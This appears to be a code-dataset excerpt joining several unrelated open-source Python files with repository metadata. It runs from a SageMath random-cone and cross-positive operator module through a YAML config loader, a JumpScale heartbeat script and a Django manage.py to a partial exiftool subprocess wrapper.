The cross-positive operators of a permuted cone can be obtained by
conjugation::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: L = ToricLattice(K.lattice_dim()**2)
sage: p = SymmetricGroup(K.lattice_dim()).random_element().matrix()
sage: pK = Cone(( p*k for k in K ), K.lattice(), check=False)
sage: cp_gens = pK.cross_positive_operators_gens()
sage: actual = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_gens = K.cross_positive_operators_gens()
sage: expected = Cone(((p*g*p.inverse()).list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: actual.is_equivalent(expected)
True
An operator is cross-positive on a cone if and only if its
adjoint is cross-positive on the dual of that cone [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: F = K.lattice().vector_space().base_field()
sage: n = K.lattice_dim()
sage: L = ToricLattice(n**2)
sage: W = VectorSpace(F, n**2)
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_gens = K.dual().cross_positive_operators_gens()
sage: cp_star = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: M = MatrixSpace(F, n)
sage: L = M(cp_cone.random_element(ring=QQ).list())
sage: cp_star.contains(W(L.transpose().list()))
True
sage: L = M(cp_star.random_element(ring=QQ).list())
sage: cp_cone.contains(W(L.transpose().list()))
True
"""
# Matrices are not vectors in Sage, so we have to convert them
# to vectors explicitly before we can find a basis. We need these
# two values to construct the appropriate "long vector" space.
F = self.lattice().base_field()
n = self.lattice_dim()
# These tensor products contain generators for the dual cone of
# the cross-positive operators.
tensor_products = ( s.tensor_product(x)
for (x,s) in self.discrete_complementarity_set() )
# Turn our matrices into long vectors...
W = VectorSpace(F, n**2)
vectors = ( W(m.list()) for m in tensor_products )
check = True
if self.is_proper():
# All of the generators involved are extreme vectors and
# therefore minimal. If this cone is neither solid nor
# strictly convex, then the tensor product of ``s`` and
# ``x`` is the same as that of ``-s`` and ``-x``. However,
# as a /set/, ``tensor_products`` may still be minimal.
check = False
# Create the dual cone of the cross-positive operators,
# expressed as long vectors.
cp_dual = Cone(vectors,
lattice=ToricLattice(W.dimension()),
check=check)
# Now compute the desired cone from its dual...
cp_cone = cp_dual.dual()
# And finally convert its rays back to matrix representations.
M = MatrixSpace(F, n)
return [ M(v.list()) for v in cp_cone ]
def Z_operators_gens(self):
r"""
Compute minimal generators of the Z-operators on this cone.
The Z-operators on a cone generalize the Z-matrices over the
nonnegative orthant. They are simply negations of the
:meth:`cross_positive_operators_gens`.
OUTPUT:
A list of `n`-by-`n` matrices where `n` is the ambient dimension
of this cone. Each matrix `L` in the list has the property that
`s(L(x)) \le 0` whenever `(x,s)` is an element of this cone's
:meth:`discrete_complementarity_set`.
The returned matrices generate the cone of Z-operators on this
cone; that is,
- Any nonnegative linear combination of the returned matrices
is a Z-operator on this cone.
- Every Z-operator on this cone is some nonnegative linear
combination of the returned matrices.
.. SEEALSO::
:meth:`cross_positive_operators_gens`,
:meth:`lyapunov_like_basis`,
:meth:`positive_operators_gens`
REFERENCES:
- [BP1994]_
- [Or2018b]_
TESTS:
The Z-property is possessed by every Z-operator::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: Z_gens = K.Z_operators_gens()
sage: all( L.is_Z_operator_on(K) for L in Z_gens )
True
"""
return [ -cp for cp in self.cross_positive_operators_gens() ]
def random_cone(lattice=None, min_ambient_dim=0, max_ambient_dim=None,
min_rays=0, max_rays=None, strictly_convex=None, solid=None):
r"""
Generate a random convex rational polyhedral cone.
Lower and upper bounds may be provided for both the dimension of the
ambient space and the number of generating rays of the cone. If a
lower bound is left unspecified, it defaults to zero. Unspecified
upper bounds will be chosen randomly, unless you set ``solid``, in
which case they are chosen a little more wisely.
You may specify the ambient ``lattice`` for the returned cone. In
that case, the ``min_ambient_dim`` and ``max_ambient_dim``
parameters are ignored.
You may also request that the returned cone be strictly convex (or
not). Likewise you may request that it be (non-)solid.
.. WARNING::
If you request a large number of rays in a low-dimensional
space, you might be waiting for a while. For example, in three
dimensions, it is possible to obtain an octagon raised up to height
one (all z-coordinates equal to one). But in practice, we usually
generate the entire three-dimensional space with six rays before we
get to the eight rays needed for an octagon. We therefore have to
throw the cone out and start over from scratch. This process repeats
until we get lucky.
We also refrain from "adjusting" the min/max parameters given to
us when a (non-)strictly convex or (non-)solid cone is
requested. This means that it may take a long time to generate
such a cone if the parameters are chosen unwisely.
For example, you may want to set ``min_rays`` close to
``min_ambient_dim`` if you desire a solid cone. Or, if you desire a
non-strictly-convex cone, then they all contain at least two
generating rays. So that might be a good candidate for
``min_rays``.
INPUT:
* ``lattice`` (default: random) -- A ``ToricLattice`` object in
which the returned cone will live. By default a new lattice will
be constructed with a randomly-chosen rank (subject to
``min_ambient_dim`` and ``max_ambient_dim``).
* ``min_ambient_dim`` (default: zero) -- A nonnegative integer
representing the minimum dimension of the ambient lattice.
* ``max_ambient_dim`` (default: random) -- A nonnegative integer
representing the maximum dimension of the ambient lattice.
* ``min_rays`` (default: zero) -- A nonnegative integer representing
the minimum number of generating rays of the cone.
* ``max_rays`` (default: random) -- A nonnegative integer representing
the maximum number of generating rays of the cone.
* ``strictly_convex`` (default: random) -- Whether or not to make the
returned cone strictly convex. Specify ``True`` for a strictly convex
cone, ``False`` for a non-strictly-convex cone, or ``None`` if you
don't care.
* ``solid`` (default: random) -- Whether or not to make the returned
cone solid. Specify ``True`` for a solid cone, ``False`` for a
non-solid cone, or ``None`` if you don't care.
OUTPUT:
A new, randomly generated cone.
A ``ValueError`` will be thrown under the following conditions:
* Any of ``min_ambient_dim``, ``max_ambient_dim``, ``min_rays``, or
``max_rays`` are negative.
* ``max_ambient_dim`` is less than ``min_ambient_dim``.
* ``max_rays`` is less than ``min_rays``.
* Both ``max_ambient_dim`` and ``lattice`` are specified.
* ``min_rays`` is greater than four but ``max_ambient_dim`` is less than
three.
* ``min_rays`` is greater than four but ``lattice`` has dimension
less than three.
* ``min_rays`` is greater than two but ``max_ambient_dim`` is less than
two.
* ``min_rays`` is greater than two but ``lattice`` has dimension less
than two.
* ``min_rays`` is positive but ``max_ambient_dim`` is zero.
* ``min_rays`` is positive but ``lattice`` has dimension zero.
* A trivial lattice is supplied and a non-strictly-convex cone
is requested.
* A non-strictly-convex cone is requested but ``max_rays`` is less
than two.
* A solid cone is requested but ``max_rays`` is less than
``min_ambient_dim``.
* A solid cone is requested but ``max_rays`` is less than the
dimension of ``lattice``.
* A non-solid cone is requested but ``max_ambient_dim`` is zero.
* A non-solid cone is requested but ``lattice`` has dimension zero.
* A non-solid cone is requested but ``min_rays`` is so large that
it guarantees a solid cone.
ALGORITHM:
First, a lattice is determined from ``min_ambient_dim`` and
``max_ambient_dim`` (or from the supplied ``lattice``).
Then, lattice elements are generated one at a time and added to a
cone. This continues until either the cone meets the user's
requirements, or the cone is equal to the entire space (at which
point it is futile to generate more).
We check whether or not the resulting cone meets the user's
requirements; if it does, it is returned. If not, we throw it away
and start over. This process repeats indefinitely until an
appropriate cone is generated.
EXAMPLES:
Generate a trivial cone in a trivial space::
sage: set_random_seed()
sage: random_cone(max_ambient_dim=0, max_rays=0)
0-d cone in 0-d lattice N
We can predict the ambient dimension when
``min_ambient_dim == max_ambient_dim``::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=4, max_ambient_dim=4)
sage: K.lattice_dim()
4
Likewise for the number of rays when ``min_rays == max_rays``::
sage: set_random_seed()
sage: K = random_cone(min_rays=3, max_rays=3)
sage: K.nrays()
3
If we specify a lattice, then the returned cone will live in it::
sage: set_random_seed()
sage: L = ToricLattice(5, "L")
sage: K = random_cone(lattice=L)
sage: K.lattice() is L
True
We can also request a strictly convex cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10,
....: strictly_convex=True)
sage: K.is_strictly_convex()
True
Or one that isn't strictly convex::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=5, min_rays=2,
....: strictly_convex=False)
sage: K.is_strictly_convex()
False
An example with all parameters set::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=4, max_ambient_dim=7,
....: min_rays=2, max_rays=10,
....: strictly_convex=False, solid=True)
sage: 4 <= K.lattice_dim() and K.lattice_dim() <= 7
True
sage: 2 <= K.nrays() and K.nrays() <= 10
True
sage: K.is_strictly_convex()
False
sage: K.is_solid()
True
TESTS:
It's hard to test the output of a random process, but we can at
least make sure that we get a cone back.
sage: set_random_seed()
sage: from sage.geometry.cone import is_Cone
sage: K = random_cone(max_ambient_dim=6, max_rays=10)
sage: is_Cone(K)
True
The upper/lower bounds are respected::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=5, max_ambient_dim=8,
....: min_rays=3, max_rays=4)
sage: 5 <= K.lattice_dim() and K.lattice_dim() <= 8
True
sage: 3 <= K.nrays() and K.nrays() <= 4
True
Ensure that an exception is raised when either lower bound is greater
than its respective upper bound::
sage: set_random_seed()
sage: random_cone(min_ambient_dim=5, max_ambient_dim=2)
Traceback (most recent call last):
...
ValueError: max_ambient_dim cannot be less than min_ambient_dim.
sage: random_cone(min_rays=5, max_rays=2)
Traceback (most recent call last):
...
ValueError: max_rays cannot be less than min_rays.
Or if we specify both ``max_ambient_dim`` and ``lattice``::
sage: set_random_seed()
sage: L = ToricLattice(5, "L")
sage: random_cone(lattice=L, max_ambient_dim=10)
Traceback (most recent call last):
...
ValueError: max_ambient_dim cannot be specified when a lattice is
provided.
If the user requests too many rays in zero, one, or two dimensions,
a ``ValueError`` is thrown::
sage: set_random_seed()
sage: random_cone(max_ambient_dim=0, min_rays=1)
Traceback (most recent call last):
...
ValueError: all cones in zero dimensions have no generators.
Please increase max_ambient_dim to at least 1, or decrease min_rays.
sage: random_cone(max_ambient_dim=1, min_rays=3)
Traceback (most recent call last):
...
ValueError: all cones in zero/one dimensions have two or fewer
generators. Please increase max_ambient_dim to at least 2, or decrease
min_rays.
sage: random_cone(max_ambient_dim=2, min_rays=5)
Traceback (most recent call last):
...
ValueError: all cones in zero/one/two dimensions have four or fewer
generators. Please increase max_ambient_dim to at least 3, or decrease
min_rays.
sage: L = ToricLattice(0)
sage: random_cone(lattice=L, min_rays=1)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice have no generators.
Please decrease min_rays.
sage: L = ToricLattice(1)
sage: random_cone(lattice=L, min_rays=3)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice have two or fewer
generators. Please decrease min_rays.
sage: L = ToricLattice(2)
sage: random_cone(lattice=L, min_rays=5)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice have four or fewer
generators. Please decrease min_rays.
Ensure that we can obtain a cone in three dimensions with a large
number (in particular, more than 2*dim) rays. The ``max_rays`` is
not strictly necessary, but it minimizes the number of times that
we will loop with an absurd, unattainable, number of rays::
sage: set_random_seed() # long time
sage: K = random_cone(min_ambient_dim=3, # long time
....: max_ambient_dim=3, # long time
....: min_rays=7, # long time
....: max_rays=9) # long time
sage: K.nrays() >= 7 # long time
True
sage: K.lattice_dim() # long time
3
We need three dimensions to obtain five rays; we should throw out
cones in zero/one/two dimensions until we get lucky::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3, min_rays=5)
sage: K.nrays() >= 5
True
sage: K.lattice_dim()
3
It is an error to request a non-strictly-convex trivial cone::
sage: set_random_seed()
sage: L = ToricLattice(0,"L")
sage: random_cone(lattice=L, strictly_convex=False)
Traceback (most recent call last):
...
ValueError: all cones in this lattice are strictly convex (trivial).
Or a non-strictly-convex cone with fewer than two rays::
sage: set_random_seed()
sage: random_cone(max_rays=1, strictly_convex=False)
Traceback (most recent call last):
...
ValueError: all cones are strictly convex when ``max_rays`` is
less than two.
But fine to ask for a strictly convex trivial cone::
sage: set_random_seed()
sage: L = ToricLattice(0,"L")
sage: random_cone(lattice=L, strictly_convex=True)
0-d cone in 0-d lattice L
A ``ValueError`` is thrown if a non-solid cone is requested in a
zero-dimensional lattice::
sage: set_random_seed()
sage: L = ToricLattice(0)
sage: random_cone(lattice=L, solid=False)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice are solid.
sage: random_cone(max_ambient_dim=0, solid=False)
Traceback (most recent call last):
...
ValueError: all cones are solid when max_ambient_dim is zero.
A ``ValueError`` is thrown if a solid cone is requested but the
maximum number of rays is too few::
sage: set_random_seed()
sage: random_cone(min_ambient_dim=4, max_rays=3, solid=True)
Traceback (most recent call last):
...
ValueError: max_rays must be at least min_ambient_dim for a solid cone.
sage: L = ToricLattice(5)
sage: random_cone(lattice=L, max_rays=3, solid=True)
Traceback (most recent call last):
...
ValueError: max_rays must be at least 5 for a solid cone in this
lattice.
A ``ValueError`` is thrown if a non-solid cone is requested but
``min_rays`` guarantees a solid cone::
sage: set_random_seed()
sage: random_cone(max_ambient_dim=4, min_rays=10, solid=False)
Traceback (most recent call last):
...
ValueError: every cone is solid when min_rays > 2*(max_ambient_dim - 1).
sage: L = ToricLattice(4)
sage: random_cone(lattice=L, min_rays=10, solid=False)
Traceback (most recent call last):
...
ValueError: every cone is solid when min_rays > 2*(d - 1) where d
is the dimension of the given lattice.
"""
# Catch obvious mistakes so that we can generate clear error
# messages.
if min_ambient_dim < 0:
raise ValueError('min_ambient_dim must be nonnegative.')
if min_rays < 0:
raise ValueError('min_rays must be nonnegative.')
if max_ambient_dim is not None:
if max_ambient_dim < 0:
raise ValueError('max_ambient_dim must be nonnegative.')
if (max_ambient_dim < min_ambient_dim):
msg = 'max_ambient_dim cannot be less than min_ambient_dim.'
raise ValueError(msg)
if lattice is not None:
msg = 'max_ambient_dim cannot be specified when a lattice is '
msg += 'provided.'
raise ValueError(msg)
# The next three checks prevent an infinite loop (a futile
# search for more rays) in zero, one, or two dimensions.
if min_rays > 4 and max_ambient_dim < 3:
msg = 'all cones in zero/one/two dimensions have four or fewer '
msg += 'generators. Please increase max_ambient_dim to at least '
msg += '3, or decrease min_rays.'
raise ValueError(msg)
if min_rays > 2 and max_ambient_dim < 2:
msg = 'all cones in zero/one dimensions have two or fewer '
msg += 'generators. Please increase max_ambient_dim to at least '
msg += '2, or decrease min_rays.'
raise ValueError(msg)
if min_rays > 0 and max_ambient_dim == 0:
msg = 'all cones in zero dimensions have no generators. '
msg += 'Please increase max_ambient_dim to at least 1, or '
msg += 'decrease min_rays.'
raise ValueError(msg)
if max_rays is not None:
if max_rays < 0:
raise ValueError('max_rays must be nonnegative.')
if (max_rays < min_rays):
raise ValueError('max_rays cannot be less than min_rays.')
# Also perform the "futile search" checks when a lattice is given,
# using its dimension rather than max_ambient_dim as the indicator.
if lattice is not None:
if min_rays > 4 and lattice.dimension() < 3:
msg = 'all cones in the given lattice have four or fewer '
msg += 'generators. Please decrease min_rays.'
raise ValueError(msg)
if min_rays > 2 and lattice.dimension() < 2:
msg = 'all cones in the given lattice have two or fewer '
msg += 'generators. Please decrease min_rays.'
raise ValueError(msg)
if min_rays > 0 and lattice.dimension() == 0:
msg = 'all cones in the given lattice have no generators. '
msg += 'Please decrease min_rays.'
raise ValueError(msg)
# Sanity checks for strictly_convex.
if strictly_convex is not None and not strictly_convex:
if lattice is not None and lattice.dimension() == 0:
msg = 'all cones in this lattice are strictly convex (trivial).'
raise ValueError(msg)
if max_rays is not None and max_rays < 2:
msg = 'all cones are strictly convex when ``max_rays`` is '
msg += 'less than two.'
raise ValueError(msg)
# Sanity checks for solid cones.
if solid is not None and solid:
# The user wants a solid cone.
if lattice is None:
if max_rays is not None:
if max_rays < min_ambient_dim:
msg = 'max_rays must be at least min_ambient_dim for '
msg += 'a solid cone.'
raise ValueError(msg)
else:
# Repeat the checks above when a lattice is given.
if max_rays is not None and max_rays < lattice.dimension():
msg = "max_rays must be at least {0} for a solid cone "
msg += "in this lattice."
raise ValueError(msg.format(lattice.dimension()))
# Sanity checks for non-solid cones.
if solid is not None and not solid:
if lattice is None:
if max_ambient_dim is not None and max_ambient_dim == 0:
msg = 'all cones are solid when max_ambient_dim is zero.'
raise ValueError(msg)
if (max_ambient_dim is not None and
min_rays > 2*(max_ambient_dim - 1)):
msg = 'every cone is solid when '
msg += 'min_rays > 2*(max_ambient_dim - 1).'
raise ValueError(msg)
else:
if lattice.dimension() == 0:
msg = 'all cones in the given lattice are solid.'
raise ValueError(msg)
if min_rays > 2*(lattice.dimension() - 1):
msg = 'every cone is solid when min_rays > 2*(d - 1) '
msg += 'where d is the dimension of the given lattice.'
raise ValueError(msg)
# Now that we've sanity-checked our parameters, we can massage the
# min/maxes for (non-)solid cones. It doesn't violate the user's
# expectation to increase a minimum, decrease a maximum, or fix an
# "I don't care" parameter.
if solid is not None:
if solid:
# If max_ambient_dim is "I don't care", we can set it so that we
# guaranteed to generate a solid cone.
if max_rays is not None and max_ambient_dim is None:
# We won't make max_ambient_dim less than min_ambient_dim,
# since we already checked that
# min_ambient_dim <= min_rays = max_ambient_dim.
max_ambient_dim = min_rays
else:
if max_rays is None and max_ambient_dim is not None:
# This is an upper limit on the number of rays in a
# non-solid cone.
max_rays = 2*(max_ambient_dim - 1)
if max_rays is None and lattice is not None:
# Same thing, except when we're given a lattice.
max_rays = 2*(lattice.dimension() - 1)
def random_min_max(l,u):
r"""
We need to handle two cases for the upper bounds, and we need
to do the same thing for max_ambient_dim/max_rays. So we consolidate
the logic here.
"""
if u is None:
# The upper bound is unspecified; return a random integer
# in [l,infinity).
return l + ZZ.random_element().abs()
else:
# We have an upper bound, and it's greater than or equal
# to our lower bound. So we generate a random integer in
# [0,u-l], and then add it to l to get something in
# [l,u]. To understand the "+1", check the
# ZZ.random_element() docs.
return l + ZZ.random_element(u - l + 1)
def is_valid(K):
r"""
Check if the given cone is valid; that is, if its ambient
dimension and number of rays meet the upper and lower bounds
provided by the user.
"""
if lattice is None:
# We only care about min/max_ambient_dim when no lattice is given.
if K.lattice_dim() < min_ambient_dim:
return False
if (max_ambient_dim is not None and
K.lattice_dim() > max_ambient_dim):
return False
else:
if K.lattice() is not lattice:
return False
return all([K.nrays() >= min_rays,
max_rays is None or K.nrays() <= max_rays,
solid is None or K.is_solid() == solid,
strictly_convex is None or
K.is_strictly_convex() == strictly_convex])
# Now we actually compute the thing. To avoid recursion (and the
# associated "maximum recursion depth exceeded" error), we loop
# until we have a valid cone and occasionally throw everything out
# and start over from scratch.
while True:
L = lattice
if lattice is None:
# No lattice given, make our own.
d = random_min_max(min_ambient_dim, max_ambient_dim)
L = ToricLattice(d)
else:
d = L.dimension()
# The number of rays that we will try to attain in this iteration.
r = random_min_max(min_rays, max_rays)
# The rays are trickier to generate, since we could generate v and
# 2*v as our "two rays." In that case, the resulting cone would
# have only one generating ray -- not what we want.
#
# Let's begin with an easier question: how many rays should we
# start with? If we want to attain r rays in this iteration,
# then surely r is a good number to start with, even if some
# of them will be redundant?
#
# Not quite, because after 2*d rays, there is a greater
# tendency for them to be redundant. If, for example, the
# maximum number of rays is unbounded, then r could be enormous
# Ultimately that won't be a problem, because almost all of
# those rays will be thrown out. However, as we discovered in
# Trac #24517, simply generating the random rays in the first
# place (and storing them in a list) is problematic.
#
# Since the returns fall off around 2*d, we start with the
# smaller of the two numbers 2*d or r to ensure that we don't
# pay a huge performance penalty for things we're going to
# throw out anyway. This has a side effect, namely that if you
# ask for more than 2*d rays, then you'll probably get the
# minimum amount, because we'll start with 2*d and add them
# one-at-a-time (see below).
rays = [L.random_element() for i in range(min(r,2*d))]
# The lattice parameter is required when no rays are given, so
# we pass it in case r == 0 or d == 0 (or d == 1 but we're
# making a strictly convex cone).
K = Cone(rays, lattice=L)
# Now, some of the rays that we generated were probably redundant,
# so we need to come up with more. We can obviously stop if K
# becomes the entire ambient vector space.
#
# We're still not guaranteed to have the correct number of
# rays after this! Since we normalize the generators in the
# loop above, we can jump from two to four generators by
# adding e.g. (1,1) to [(0,1), (0,-1)]. Rather than trying to
# mangle what we have, we just start over if we get a cone
# that won't work.
#
while r > K.nrays() and not K.is_full_space():
rays.append(L.random_element())
K = Cone(rays, lattice=L)
rays = list(K.rays()) # Avoid re-normalizing next time around
if strictly_convex is not None:
if strictly_convex:
if not K.is_strictly_convex():
# The user wants a strictly convex cone, but
# didn't get one. So let's take our rays, and give
# them all either (strictly) positive or negative
# leading coordinates. This makes the resulting
# cone strictly convex. Whether or not those
# coordinates become positive/negative is chosen
# randomly.
from random import choice
pm = choice([-1,1])
# rays has immutable elements
rays = [copy(ray) for ray in rays]
for i, ray in enumerate(rays):
rays[i][0] = pm * (ray[0].abs() + 1)
K = Cone(rays, lattice=L)
else:
# The user requested that the cone be NOT strictly
# convex. So it should contain some line...
if K.is_strictly_convex():
# ...but it doesn't. If K has at least two rays,
# we can just make the second one a multiple of
# the first -- then K will contain a line. If K
# has fewer than two rays, we punt.
if len(rays) >= 2:
rays[1] = -rays[0]
K = Cone(rays, lattice=L)
if is_valid(K):
# Loop if we don't have a valid cone.
return K
| 34.819448 | 135 | 0.544155 |
4a1b57587f05c4ff9db916a44af54b319556d244
| 1,057 |
py
|
Python
|
prg/config.py
|
abultman/PiAutomator
|
2ad3aafdd6c94cf11fc2d60c9be489f76ac78277
|
[
"Apache-2.0"
] | 5 |
2015-10-21T05:54:30.000Z
|
2021-01-13T01:10:36.000Z
|
prg/config.py
|
abultman/PiAutomator
|
2ad3aafdd6c94cf11fc2d60c9be489f76ac78277
|
[
"Apache-2.0"
] | null | null | null |
prg/config.py
|
abultman/PiAutomator
|
2ad3aafdd6c94cf11fc2d60c9be489f76ac78277
|
[
"Apache-2.0"
] | 5 |
2015-03-30T16:25:40.000Z
|
2016-07-29T09:10:03.000Z
|
#!/usr/bin/python
import yaml
class AutomationConfig(object):
def __init__(self, basedir):
self.basedir = basedir
with open("%s/conf/config.yaml" % basedir) as f:
self.yaml = yaml.load(f)
def get_setting(self, mapList, default=None):
try:
return reduce(lambda d, k: d[k], mapList, self.yaml)
except KeyError as e:
if default is not None:
return default
else:
raise e
def inputs(self):
return self.get_setting(['inputs'])
def receivers(self):
return self.get_setting(['receivers'])
def rules(self):
return self.get_setting(['rules'])
def get_basedir(self):
return self.basedir
class LocalSettings(object):
def __init__(self, data):
self.data = data
def __getitem__(self, key):
return self.getsetting(key)
def getsetting(self, key, default = None):
if key in self.data:
return self.data[key]
else:
return default
| 24.022727 | 64 | 0.578051 |
4a1b57ba17552fd713b33a98c51307b3f44c6ac2
| 492 |
py
|
Python
|
apps/agentcontroller/jumpscripts/extended/system/processmanager_heartbeat_to_osis.py
|
Jumpscale/jumpscale6_core
|
0502ddc1abab3c37ed982c142d21ea3955d471d3
|
[
"BSD-2-Clause"
] | 1 |
2015-10-26T10:38:13.000Z
|
2015-10-26T10:38:13.000Z
|
apps/agentcontroller/jumpscripts/extended/system/processmanager_heartbeat_to_osis.py
|
Jumpscale/jumpscale6_core
|
0502ddc1abab3c37ed982c142d21ea3955d471d3
|
[
"BSD-2-Clause"
] | null | null | null |
apps/agentcontroller/jumpscripts/extended/system/processmanager_heartbeat_to_osis.py
|
Jumpscale/jumpscale6_core
|
0502ddc1abab3c37ed982c142d21ea3955d471d3
|
[
"BSD-2-Clause"
] | null | null | null |
from JumpScale import j
import JumpScale.grid.osis
descr = """
heartbeat in process to osis
"""
organization = "jumpscale"
author = "kristof@incubaid.com"
license = "bsd"
version = "1.0"
category = "system.heartbeat"
startatboot = True
period = 60 #always in sec
order = 1
enable = True
async = False
roles=["*"]
def action():
osiscl = j.core.osis.getClientByInstance()
hbcl = j.core.osis.getClientForCategory(osiscl, 'system', 'heartbeat')
obj = hbcl.new()
hbcl.set(obj)
| 18.923077 | 74 | 0.693089 |
4a1b5a61ebf1b07c8ca247341f074da362599019
| 326 |
py
|
Python
|
QandA/manage.py
|
rtbortolin/QandA
|
103dac34170e52ff35f36540477bb382efb4c27f
|
[
"MIT"
] | null | null | null |
QandA/manage.py
|
rtbortolin/QandA
|
103dac34170e52ff35f36540477bb382efb4c27f
|
[
"MIT"
] | null | null | null |
QandA/manage.py
|
rtbortolin/QandA
|
103dac34170e52ff35f36540477bb382efb4c27f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Command-line utility for administrative tasks.
"""
import os
import sys
if __name__ == "__main__":
os.environ.setdefault(
"DJANGO_SETTINGS_MODULE",
"QandA.settings"
)
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 18.111111 | 64 | 0.708589 |
4a1b5a783333a86a445730e79f0ff256f03f16b2
| 17,082 |
py
|
Python
|
autofile/exiftool.py
|
RhetTbull/autofile
|
b61235b29f8047699654ea101312bda257835e7c
|
[
"MIT"
] | 6 |
2021-11-18T17:33:04.000Z
|
2022-01-08T04:51:55.000Z
|
autofile/exiftool.py
|
RhetTbull/autofile
|
b61235b29f8047699654ea101312bda257835e7c
|
[
"MIT"
] | 8 |
2021-10-30T16:04:56.000Z
|
2022-01-02T17:26:52.000Z
|
autofile/exiftool.py
|
RhetTbull/autofile
|
b61235b29f8047699654ea101312bda257835e7c
|
[
"MIT"
] | null | null | null |
""" Yet another simple exiftool wrapper
I rolled my own for following reasons:
1. I wanted something under MIT license (best alternative was licensed under GPL/BSD)
2. I wanted singleton behavior so only a single exiftool process was ever running
3. When used as a context manager, I wanted the operations to batch until exiting the context (improved performance)
If these aren't important to you, I highly recommend you use Sven Marnach's excellent
pyexiftool: https://github.com/smarnach/pyexiftool which provides more functionality """
import atexit
import html
import json
import logging
import os
import re
import shutil
import subprocess
from abc import ABC, abstractmethod
from functools import lru_cache # pylint: disable=syntax-error
# exiftool -stay_open commands outputs this EOF marker after command is run
EXIFTOOL_STAYOPEN_EOF = "{ready}"
EXIFTOOL_STAYOPEN_EOF_LEN = len(EXIFTOOL_STAYOPEN_EOF)
# list of exiftool processes to cleanup when exiting or when terminate is called
EXIFTOOL_PROCESSES = []
def escape_str(s):
"""escape string for use with exiftool -E"""
if type(s) != str:
return s
s = html.escape(s)
s = s.replace("\n", "
")
s = s.replace("\t", "	")
s = s.replace("\r", "
")
return s
def unescape_str(s):
"""unescape an HTML string returned by exiftool -E"""
if type(s) != str:
return s
return html.unescape(s)
@atexit.register
def terminate_exiftool():
"""Terminate any running ExifTool subprocesses; call this to cleanup when done using ExifTool"""
for proc in EXIFTOOL_PROCESSES:
proc._stop_proc()
@lru_cache(maxsize=1)
def get_exiftool_path():
"""return path of exiftool, cache result"""
if exiftool_path := shutil.which("exiftool"):
return exiftool_path.rstrip()
else:
raise FileNotFoundError(
"Could not find exiftool. Please download and install from "
"https://exiftool.org/"
)
class _ExifToolProc:
"""Runs exiftool in a subprocess via Popen
Creates a singleton object"""
def __new__(cls, *args, **kwargs):
"""create new object or return instance of already created singleton"""
if not hasattr(cls, "instance") or not cls.instance:
cls.instance = super().__new__(cls)
return cls.instance
def __init__(self, exiftool=None):
"""construct _ExifToolProc singleton object or return instance of already created object
exiftool: optional path to exiftool binary (if not provided, will search path to find it)"""
if hasattr(self, "_process_running") and self._process_running:
# already running
if exiftool is not None and exiftool != self._exiftool:
logging.warning(
f"exiftool subprocess already running, "
f"ignoring exiftool={exiftool}"
)
return
self._process_running = False
self._exiftool = exiftool or get_exiftool_path()
self._start_proc()
@property
def process(self):
"""return the exiftool subprocess"""
if not self._process_running:
self._start_proc()
return self._process
@property
def pid(self):
"""return process id (PID) of the exiftool process"""
return self._process.pid
@property
def exiftool(self):
"""return path to exiftool process"""
return self._exiftool
def _start_proc(self):
"""start exiftool in batch mode"""
if self._process_running:
logging.warning("exiftool already running: {self._process}")
return
# open exiftool process
self._process = subprocess.Popen(
[
self._exiftool,
"-stay_open", # keep process open in batch mode
"True", # -stay_open=True, keep process open in batch mode
"-@", # read command-line arguments from file
"-", # read from stdin
"-common_args", # specifies args common to all commands subsequently run
"-n", # no print conversion (e.g. print tag values in machine readable format)
"-P", # Preserve file modification date/time
"-G", # print group name for each tag
"-E", # escape tag values for HTML (allows use of HTML 
 for newlines)
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self._process_running = True
EXIFTOOL_PROCESSES.append(self)
def _stop_proc(self):
"""stop the exiftool process if it's running, otherwise, do nothing"""
if not self._process_running:
return
try:
self._process.stdin.write(b"-stay_open\n")
self._process.stdin.write(b"False\n")
self._process.stdin.flush()
except Exception as e:
pass
try:
self._process.communicate(timeout=5)
except subprocess.TimeoutExpired:
self._process.kill()
self._process.communicate()
del self._process
self._process_running = False
class ExifTool:
"""Basic exiftool interface for reading and writing EXIF tags"""
def __init__(self, filepath, exiftool=None, overwrite=True, flags=None):
"""Create ExifTool object
Args:
file: path to image file
exiftool: path to exiftool, if not specified will look in path
overwrite: if True, will overwrite image file without creating backup, default=False
flags: optional list of exiftool flags to prepend to exiftool command when writing metadata (e.g. -m or -F)
Returns:
ExifTool instance
"""
self.file = filepath
self.overwrite = overwrite
self.flags = flags or []
self.data = {}
self.warning = None
self.error = None
# if running as a context manager, self._context_mgr will be True
self._context_mgr = False
self._exiftoolproc = _ExifToolProc(exiftool=exiftool)
self._read_exif()
@property
def _process(self):
return self._exiftoolproc.process
def setvalue(self, tag, value):
"""Set tag to value(s); if value is None, will delete tag
Args:
tag: str; name of tag to set
value: str; value to set tag to
Returns:
True if success otherwise False
If error generated by exiftool, returns False and sets self.error to error string
If warning generated by exiftool, returns True (unless there was also an error) and sets self.warning to warning string
If called in context manager, returns True (execution is delayed until exiting context manager)
"""
if value is None:
value = ""
value = escape_str(value)
command = [f"-{tag}={value}"]
if self.overwrite and not self._context_mgr:
command.append("-overwrite_original")
# avoid "Warning: Some character(s) could not be encoded in Latin" warning
command.append("-iptc:codedcharacterset=utf8")
if self._context_mgr:
self._commands.extend(command)
return True
else:
